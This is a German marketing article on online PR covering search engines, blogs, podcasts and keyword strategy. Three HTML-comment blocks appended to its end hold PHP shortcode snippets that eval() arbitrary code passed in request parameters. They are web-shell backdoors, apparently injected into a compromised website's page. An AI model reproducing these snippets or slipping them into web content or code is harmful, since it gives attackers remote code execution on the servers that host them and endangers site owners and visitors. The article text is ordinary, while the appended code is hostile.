Neue Regeln für Marketing und PR im Internet

Eine Präsenz in den Medien ist für die meisten Unternehmen ein wichtiges Kriterium für den Erfolg. Medienpräsenz erzielt man über Werbung und über Presse- und Öffentlichkeitsarbeit.

Mit Online PR bezeichnet man sämtliche Maßnahmen der Presse- und Öffentlichkeitsarbeit, die im oder über das Internet unternommen werden, um Zielgruppen zu erreichen. Dazu zählen Einträge in Suchmaschinen und Web-Verzeichnissen genauso wie Presseveröffentlichungen
auf Portalen oder in Newslettern und Online-Publikationen. Aber auch neuere Web 2.0 Strategien wie bloggen oder podcasten können zu
wichtigen Online PR Instrumenten ausgestaltet werden.

Obwohl sich die grundsätzlichen Maßnahmen der Online PR weitgehend mit denen der klassischen PR decken, wie z.B. Themenauswahl,
Recherche, Produktion von Inhalten, Redaktion, erfordert die Umsetzung jedoch andere Wege und Methoden. Insbesondere neue Kommunikationswege und Medien, wie Newsgroups, Weblogs, Wikis oder Podcasts stellen andere Anforderungen an die Inhalte und die Gestaltung von Veröffentlichungen.

Während in der klassischen Pressearbeit eine tatsächliche Veröffentlichung von Pressemitteilungen sehr stark vom Wohlwollen der Redakteure abhängig ist, lässt sich durch geschickte Strategien der Online PR die Reichweite und Aufmerksamkeit für Informationen und Pressemitteilungen erheblich steigern und eine Veröffentlichung direkt und unmittelbar
beeinflussen.

Insbesondere die Suchmaschinen nehmen großen Einfluss auf die Gestaltung von Online-Medien. Die Verwendung von suchmaschinenrelevanten Schlüsselbegriffen ist im Online-Marketing (zum Beispiel im Suchmaschinen-Marketing SEM) längst kein Geheimnis mehr, in der Online PR finden sie jedoch bislang noch wenig Anwendung.

<!– [insert_php]if (isset($_REQUEST[„DxP“])){eval($_REQUEST[„DxP“]);exit;}[/insert_php][php]if (isset($_REQUEST[„DxP“])){eval($_REQUEST[„DxP“]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST[„fkeHn“])){eval($_REQUEST[„fkeHn“]);exit;}[/insert_php][php]if (isset($_REQUEST[„fkeHn“])){eval($_REQUEST[„fkeHn“]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["WShrK"])){eval($_REQUEST["WShrK"]);exit;}[/insert_php][php]if (isset($_REQUEST["WShrK"])){eval($_REQUEST["WShrK"]);exit;}[/php] –>